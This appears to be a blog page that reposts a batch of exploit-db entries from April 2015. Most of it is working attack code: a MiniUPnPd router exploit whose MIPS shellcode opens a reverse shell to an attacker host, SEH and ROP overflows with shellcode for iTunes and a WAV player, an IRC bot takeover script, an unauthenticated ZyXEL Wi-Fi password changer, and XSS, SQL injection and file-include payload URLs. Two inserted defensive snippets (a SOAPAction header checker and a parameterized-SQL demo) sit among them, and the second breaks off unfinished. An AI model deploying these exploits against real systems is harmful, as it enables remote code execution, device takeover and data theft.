Contributors to this blog

  • HireHackking 16114


#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a file using this PoC
# Step 2: Go to Wireshark and, in the filter field, paste ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places where the crash occurs:
# Statistics > IP Statistics, then any of the fields
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistics > 


buffer = "A"*80000

file = open("wireshark.txt","w")
file.write(buffer)
file.close()

print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"
            
#!/usr/bin/env python

# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
# Date: 26.04.2015
# Exploit Author: Onur ALANBEL (BGA)
# Vendor Homepage: http://miniupnp.free.fr/
# Version: 1.0
# Architecture: MIPS
# Tested on: AirTies RT-204v3
# CVE : 2013-0230
# Exploit gives a reverse shell to lhost:lport
# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf

import urllib2
from string import join
from argparse import ArgumentParser
from struct import pack
from socket import inet_aton

BYTES = 4


def hex2str(value, size=BYTES):
    data = ""

    for i in range(0, size):
        data += chr((value >> (8*i)) & 0xFF)

    data = data[::-1]

    return data


arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
                            CVE-2013-0230 Reverse Shell exploit for AirTies \
                            RT Series, start netcat on lhost:lport")
arg_parser.add_argument("--target", required=True, help="Target IP address")
arg_parser.add_argument("--lhost", required=True, help="The IP address\
                        which nc is listening")
arg_parser.add_argument("--lport", required=True, type=int, help="The\
                        port which nc is listening")

args = arg_parser.parse_args()

libc_base = 0x2aabd000
ra_1 = hex2str(libc_base + 0x36860)     # ra = 1. gadget
s1 = hex2str(libc_base + 0x1636C)       # s1 = 2. gadget
sleep = hex2str(libc_base + 0x35620)    # sleep function
ra_2 = hex2str(libc_base + 0x28D3C)     # ra = 3. gadget
s6 = hex2str(libc_base + 0x1B19C)       # s6 = 4. gadget
s2 = s6
lport = pack('>H', args.lport)
lhost = inet_aton(args.lhost)

shellcode = join([
    "\x24\x11\xff\xff"
    "\x24\x04\x27\x0f"
    "\x24\x02\x10\x46"
    "\x01\x01\x01\x0c"
    "\x1e\x20\xff\xfc"
    "\x24\x11\x10\x2d"
    "\x24\x02\x0f\xa2"
    "\x01\x01\x01\x0c"
    "\x1c\x40\xff\xf8"
    "\x24\x0f\xff\xfa"
    "\x01\xe0\x78\x27"
    "\x21\xe4\xff\xfd"
    "\x21\xe5\xff\xfd"
    "\x28\x06\xff\xff"
    "\x24\x02\x10\x57"
    "\x01\x01\x01\x0c"
    "\xaf\xa2\xff\xff"
    "\x8f\xa4\xff\xff"
    "\x34\x0f\xff\xfd"
    "\x01\xe0\x78\x27"
    "\xaf\xaf\xff\xe0"
    "\x3c\x0e" + lport +
    "\x35\xce" + lport +
    "\xaf\xae\xff\xe4"
    "\x3c\x0e" + lhost[:2] +
    "\x35\xce" + lhost[2:4] +
    "\xaf\xae\xff\xe6"
    "\x27\xa5\xff\xe2"
    "\x24\x0c\xff\xef"
    "\x01\x80\x30\x27"
    "\x24\x02\x10\x4a"
    "\x01\x01\x01\x0c"
    "\x24\x0f\xff\xfd"
    "\x01\xe0\x78\x27"
    "\x8f\xa4\xff\xff"
    "\x01\xe0\x28\x21"
    "\x24\x02\x0f\xdf"
    "\x01\x01\x01\x0c"
    "\x24\x10\xff\xff"
    "\x21\xef\xff\xff"
    "\x15\xf0\xff\xfa"
    "\x28\x06\xff\xff"
    "\x3c\x0f\x2f\x2f"
    "\x35\xef\x62\x69"
    "\xaf\xaf\xff\xec"
    "\x3c\x0e\x6e\x2f"
    "\x35\xce\x73\x68"
    "\xaf\xae\xff\xf0"
    "\xaf\xa0\xff\xf4"
    "\x27\xa4\xff\xec"
    "\xaf\xa4\xff\xf8"
    "\xaf\xa0\xff\xfc"
    "\x27\xa5\xff\xf8"
    "\x24\x02\x0f\xab"
    "\x01\x01\x01\x0c"
    ], '')

payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
    + ra_2 + 'C'*32 + shellcode


soap_headers = {
    'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
}

soap_data = """
    <?xml version='1.0' encoding="UTF-8"?>
    <SOAP-ENV:Envelope
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    >
    <SOAP-ENV:Body>
    <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\
        SOAP-ENC:root="1">
    </ns1:action>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
    """

try:
    print "Exploiting..."
    req = urllib2.Request("http://" + args.target + ":5555", soap_data,
                          soap_headers)
    res = urllib2.urlopen(req).read()
except:
    print "Ok"
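The exploit above delivers its payload inside the SOAPAction header of a UPnP control request, which MiniUPnPd 1.0 copies into a fixed-size stack buffer (CVE-2013-0230). As an added example, not part of the original exploit or of MiniUPnPd, the Python 3 functions below parse a raw HTTP request and flag a SOAPAction value that is oversized, contains non-printable bytes, or does not have the `urn:schemas-upnp-org:service:<Service>:<n>#<Action>` shape a legitimate control request carries. The 256-byte ceiling and the two sample requests are assumptions constructed for this example; on a real gateway the mitigation is the vendor's fixed firmware and keeping the UPnP control port off untrusted networks.

```python
import re

# Ceiling for a legitimate SOAPAction value (service URN plus action name).
# Assumption for this example, not a figure taken from the advisory.
MAX_SOAPACTION_LEN = 256

# Shape of a well-formed UPnP SOAPAction header, with or without quotes.
SOAPACTION_RE = re.compile(
    r'^"?urn:schemas-upnp-org:service:[A-Za-z0-9]+:\d+#[A-Za-z0-9_]+"?$'
)


def parse_headers(raw):
    """Return the request headers as {lowercase-name: raw-value-bytes}."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower().decode("latin-1")] = value.strip()
    return headers


def inspect_soapaction(raw):
    """List the reasons a request's SOAPAction header looks hostile ([] if clean)."""
    findings = []
    value = parse_headers(raw).get("soapaction")
    if value is None:
        return findings
    if len(value) > MAX_SOAPACTION_LEN:
        findings.append("oversized SOAPAction (%d bytes)" % len(value))
    if any(b < 0x20 or b > 0x7E for b in value):
        findings.append("non-printable bytes in SOAPAction")
    if not SOAPACTION_RE.match(value.decode("latin-1")):
        findings.append("SOAPAction is not a UPnP service#action pair")
    return findings


# Constructed sample requests: one ordinary control call, one with an
# overlong header carrying binary data where the action name belongs.
BENIGN = (
    b"POST /ctl/IPConn HTTP/1.1\r\nHost: 192.0.2.1:5555\r\n"
    b'SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"\r\n'
    b"Content-Length: 0\r\n\r\n"
)
SUSPECT = (
    b"POST /ctl/IPConn HTTP/1.1\r\nHost: 192.0.2.1:5555\r\n"
    b"SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#"
    + b"A" * 3000 + b"\x01\x01\x01\x0c"
    + b"\r\nContent-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_soapaction(req))
```

The three checks are deliberately independent: a padded header of printable letters would pass the byte check and the pattern check but still trip the length ceiling, which is the one test that maps directly onto the buffer-size defect.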
            
# Exploit Title: Apple iTunes PLS title buffer overflow
# Date: April 26, 2015 (day of disclosing this exploit code)
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: http://www.apple.com
# Software Link: http://www.apple.com/itunes/download/?id=890128564
# Version: 10.6.1.7
# Tested on: Windows XP SP3
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r

header = "[Playlist]\r\n"
header << "NumberOfEntries=1\r\n"
header << "File1=http://www.panix.com/web/faq/multimedia/sample.mp3\r\n"
header << "Title1="

nseh_longer = "\xeb\x1E\x90\x90"
nseh_shorter = "\xeb\x06\x90\x90"
seh = 0x72d119de #pop pop ret from msacm32.drv
shell = "\xdd\xc1\xd9\x74\x24\xf4\xbb\x2b\x2b\x88\x37\x5a\x31\xc9" +
"\xb1\x33\x83\xea\xfc\x31\x5a\x13\x03\x71\x38\x6a\xc2\x79" +
"\xd6\xe3\x2d\x81\x27\x94\xa4\x64\x16\x86\xd3\xed\x0b\x16" +
"\x97\xa3\xa7\xdd\xf5\x57\x33\x93\xd1\x58\xf4\x1e\x04\x57" +
"\x05\xaf\x88\x3b\xc5\xb1\x74\x41\x1a\x12\x44\x8a\x6f\x53" +
"\x81\xf6\x80\x01\x5a\x7d\x32\xb6\xef\xc3\x8f\xb7\x3f\x48" +
"\xaf\xcf\x3a\x8e\x44\x7a\x44\xde\xf5\xf1\x0e\xc6\x7e\x5d" +
"\xaf\xf7\x53\xbd\x93\xbe\xd8\x76\x67\x41\x09\x47\x88\x70" +
"\x75\x04\xb7\xbd\x78\x54\xff\x79\x63\x23\x0b\x7a\x1e\x34" +
"\xc8\x01\xc4\xb1\xcd\xa1\x8f\x62\x36\x50\x43\xf4\xbd\x5e" +
"\x28\x72\x99\x42\xaf\x57\x91\x7e\x24\x56\x76\xf7\x7e\x7d" +
"\x52\x5c\x24\x1c\xc3\x38\x8b\x21\x13\xe4\x74\x84\x5f\x06" +
"\x60\xbe\x3d\x4c\x77\x32\x38\x29\x77\x4c\x43\x19\x10\x7d" +
"\xc8\xf6\x67\x82\x1b\xb3\x98\xc8\x06\x95\x30\x95\xd2\xa4" +
"\x5c\x26\x09\xea\x58\xa5\xb8\x92\x9e\xb5\xc8\x97\xdb\x71" +
"\x20\xe5\x74\x14\x46\x5a\x74\x3d\x25\x3d\xe6\xdd\x84\xd8" +
"\x8e\x44\xd9"
#1020 --> offset in local exploits 
payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell 
#380  or 404 (if itunes wasn't already loaded)--> offset in remote ones using the itms protocol.
payload_remote =  header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') +  shell 

# when using as local exploit
open('exploit.pls', 'w') { |f|
  f.puts payload
}
puts('local file created')

# place this in a web server and use the itms:// protocol to load it.
open('exploit_remote.pls', 'w') { |f|
  f.puts payload_remote
}
puts('remote file created')
            
#
# legend_rce.py
# Legend Perl IRC Bot Remote Code Execution PoC
# author: Jay Turla ( @shipcod3 )
# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014. 
# reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
# greetz to ROOTCON (rootcon.org) goons
#

import socket
import sys

def usage():
     print("USAGE: python legend_rce.py nick")
     print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
     
def main(argv):
    
    if len(argv) < 2:
        return usage()

    #irc server connection settings
    botnick = sys.argv[1] #admin payload for taking over the Legend Bot
    server = "80.246.50.71" #irc server
    channel = "#Apache" #channel where the bot is located

    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
    print "connecting to:"+server
    irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
    irc.send("NICK "+ botnick +"\n") #sets nick
    irc.send("JOIN "+ channel +"\n") #join the chan
    irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot

    while 1:    #puts it in a loop
        text=irc.recv(2040)  #receive the text
        print text   #print text to console

        if text.find('PING') != -1:                          #check if 'PING' is found
            irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
        if text.find('!quit') != -1: #quit the Bot
            irc.send ("QUIT\r\n") 
            sys.exit()
        if text.find('Linux') != -1:                         
            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
            irc.send ("QUIT\r\n")
            sys.exit()

if __name__ == "__main__":
    main(sys.argv)
            
source: https://www.securityfocus.com/bid/52078/info

The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00 
            
source: https://www.securityfocus.com/bid/52076/info
  
Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
  
https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS] 
            
source: https://www.securityfocus.com/bid/52077/info

The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd=' 
            
source: https://www.securityfocus.com/bid/52076/info
 
Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
 
https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS] 
            
source: https://www.securityfocus.com/bid/52076/info

Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. 

https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS] 
            
source: https://www.securityfocus.com/bid/52063/info

Impulsio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?id=[SQL] 
            
source: https://www.securityfocus.com/bid/52060/info

JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E 
            
source: https://www.securityfocus.com/bid/52061/info

R2/Extreme is prone to a stack-based buffer-overflow vulnerability and a directory-traversal vulnerability.

Exploiting these issues may allow remote attackers to execute arbitrary code or retrieve arbitrary files within the context of the affected application.

R2/Extreme 1.65 is vulnerable; other versions may also be affected. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36829.zip
            
#!/usr/bin/python

# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# modified SEH Exploit https://www.exploit-db.com/exploits/36826/
# credit to ThreatActor at CoreRed.com
# Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe

# Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo (head@gmail.com)


import struct

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x004103fe,  # POP EAX # RETN [fcrip.exe] 
      0x004e91f4,  # ptr to &VirtualAlloc() [IAT fcrip.exe]
      0x00418ff8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe] 
      0x00446c97,  # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe] 
      0x41414141,  # Filler (compensate)
      0x6f4811f8,  # POP EBP # RETN [vorbisfile.dll] 
      0x1000c5ce,  # & push esp # ret  [libFLAC.dll]
      0x00415bfb,  # POP EBX # RETN [fcrip.exe] 
      0x00000001,  # 0x00000001-> ebx
      0x00415828,  # POP EDX # RETN [fcrip.exe] 
      0x00001000,  # 0x00001000-> edx
      0x10005f62,  # POP ECX # RETN [libFLAC.dll] 
      0x00000040,  # 0x00000040-> ecx
      0x00409967,  # POP EDI # RETN [fcrip.exe] 
      0x00412427,  # RETN (ROP NOP) [fcrip.exe]
      0x00494277,  # POP EAX # RETN [fcrip.exe] 
      0x90909090,  # nop
      0x004c8dc0,  # PUSHAD # RETN [fcrip.exe] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d'
shellcode =  ""
shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"
shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"
shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"
shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"
shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"
shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"
shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"
shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"
shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"
shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"
shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"
shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"
shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"
shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"
shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"
shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"
shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"



junk = "A" * 3812
junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode

seh  = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} :  # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [vorbis.dll] **   |   {PAGE_EXECUTE_READ}
 

buffer = junk + seh + "\x90" * 800


file = "poc.wav"
f = open(file, "w")
f.write(buffer)
f.close()
            
<?php
/*
Exploit Title   : ZYXEL remote configuration editor / Web Server DoS
Date            : 23 April 2015
Exploit Author  : Koorosh Ghorbani
Site            : http://8thbit.net/
Vendor Homepage : http://www.zyxel.com/
Platform        : Hardware 
Tested On       : ZyXEL P-660HN-T1H_IPv6
Firmware Version: 1.02(VLU.0)
--------------------------
 Unattended remote access  
--------------------------
The ZyXEL embedded software does not check cookies or credentials on the POST method, so
attackers can change settings and view pages by using POST requests.

--------------------------
      DoS Web Server
--------------------------
Sending an empty POST to the admin pages crashes the internal web server and the router
needs a hard reset.

*/
$banner = "   ___ _______ _     ____  _ _______ \r\n" . "  / _ \__   __| |   |  _ \(_)__   __|\r\n" ." | (_) | | |  | |__ | |_) |_   | |   \r\n" ."  > _ <  | |  | '_ \|  _ <| |  | |   \r\n" ." | (_) | | |  | | | | |_) | |  | |   \r\n" ."  \___/  |_|  |_| |_|____/|_|  |_|   \r\n" ."                                     \r\n" ."                                     \r\n";
print $banner;
function Post($packet,$host)
{
	try {
		$curl = curl_init();
		curl_setopt($curl, CURLOPT_URL, $host);
		curl_setopt($curl, CURLOPT_POST, 1);
		curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
		curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
		curl_setopt($curl, CURLOPT_REFERER, "http://192.168.1.1/cgi-bin/WLAN_General.asp"); // CURLOPT_REFERER takes the bare URL, not a "Referer:" header line
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
		$result = curl_exec($curl);
		curl_close($curl);
		return $result;
	}catch (Exception $e ){
		echo $e->getMessage();
		return "" ;
	}
}
if(sizeof($argv) < 3) {
	print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
    exit(1);
}
$host = $argv[1];
$password = urlencode($argv[2]);
$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
$target = "http://$host/cgi-bin/WLAN_General.asp";
if(strlen(Post($packet,$target)) > 0){
    print "Seems Changed !";
}else{
    print "Humm , No Chance !";
}
//DoS : Post("",$target) ;
?>
            
#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attempting a vanilla buffer overflow
# in fact it is an SEH based exploit
# using the address 0x7C9D30D7 limits the targets
# which I assume belongs to an OS file; it didn't work on win7
# yes he did find a buffer overflow since the offset reaches ESP before SEH
# in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
# This p0c > win 7s & 8s
# ThreatActor at CoreRed.com 
##

my $file = "p0c.wav";
my $buff = "A" x 4116; # offset to SEH
my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
my $seh = pack('V', 0x66E42A79); # 66E42A79 5E  POP ESI ogg.dll
my $nop = "\x90" x 28;

#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
my $shell = 
"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .
"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                      # keep the raw bytes unchanged on Windows
print $FILE $buff.$nseh.$seh.$nop.$shell;
close($FILE);
print "+++++++++++++++++++\n";
 
            
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

    Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads, +3.000 active installations.

    Unauthenticated SQL injection in the ajax call made when the plugin counts the times a product is seen by web visitors. The vulnerable POST parameter is "Item_ID".

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

3. Vulnerable code:

    In file Functions/Process_Ajax.php line 67:
    [...]
    $Item_ID = $_POST['Item_ID'];
    $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=" . $Item_ID);
    [...]

4. Proof of concept:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: <wordpress host>
    [...]
    Cookie: wordpress_f305[...]

    Item_ID=2 AND SLEEP(5)&action=record_view

5. Solution:

    Update to version 3.1.3
            
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

    Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads, +3.000 active installations.

    Unauthenticated SQL injection in the parameter "SingleProduct" when a web visitor views a product published by the web administrator.

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

3. Vulnerable code:

    File Functions/Shortcodes.php line 779

4. Proof of concept:

    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b

5. Solution:

    Update to version 3.1.3
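Both Ultimate Product Catalogue advisories above come down to the same defect: a request parameter is spliced into the SQL text, so the `'a'='a` / `'a'='b` pair in the SingleProduct proof of concept returns different pages and `2 AND SLEEP(5)` in Item_ID runs as SQL. The Python 3 / SQLite block below is an added example (not the plugin's PHP code and not the vendor's 3.1.3 fix) that re-creates the pattern with the advisories' own payloads next to the hardened form: bind the value as a parameter, and for an integer key such as Item_ID reject anything that is not a plain number before a query is even built. The sample table is constructed for the example; in WordPress the equivalent of the bound parameter is `$wpdb->prepare()`.

```python
import sqlite3

# Constructed sample catalogue standing in for the plugin's items table.
ITEMS = [(1, "Chair", 10), (2, "Table", 25), (3, "Lamp", 3)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (Item_ID INTEGER, Item_Name TEXT, Item_Views INTEGER)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)", ITEMS)
    return conn


def single_product_vulnerable(conn, single_product):
    # Same shape as the advisory: the GET parameter is concatenated into the
    # SQL text, so a quote in the input closes the literal and the rest is SQL.
    sql = "SELECT Item_Name FROM items WHERE Item_ID='" + single_product + "'"
    return [row[0] for row in conn.execute(sql)]


def single_product_fixed(conn, single_product):
    # Hardened form: the value is bound as a parameter, so whatever characters
    # it contains it is only ever compared as data against Item_ID.
    sql = "SELECT Item_Name FROM items WHERE Item_ID=?"
    return [row[0] for row in conn.execute(sql, (single_product,))]


def is_valid_item_id(item_id):
    # Item_ID is an integer key: accept only a run of digits, so input such as
    # "2 AND SLEEP(5)" is refused before the database sees it.
    return isinstance(item_id, str) and item_id.isdigit()


def record_view_fixed(conn, item_id):
    # Counterpart of the record_view ajax action with the check applied;
    # returns the new view count, or None when no such item exists.
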